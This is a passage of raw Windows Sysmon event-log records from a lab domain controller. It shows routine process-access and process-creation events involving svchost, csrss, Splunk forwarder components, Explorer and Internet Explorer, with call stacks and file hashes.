10341000x800000000000000013401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9418-6005-1805-00000000A301}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9418-6005-1805-00000000A301}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-9418-6005-1805-00000000A301}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9419-6005-1A05-00000000A301}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9419-6005-1A05-00000000A301}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9419-6005-1A05-00000000A301}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.742{59A5CD1D-9419-6005-1A05-00000000A301}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09 10341000x800000000000000013439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a 10341000x800000000000000013438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09 10341000x800000000000000013435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a 10341000x800000000000000013434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.570{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.570{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.570{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 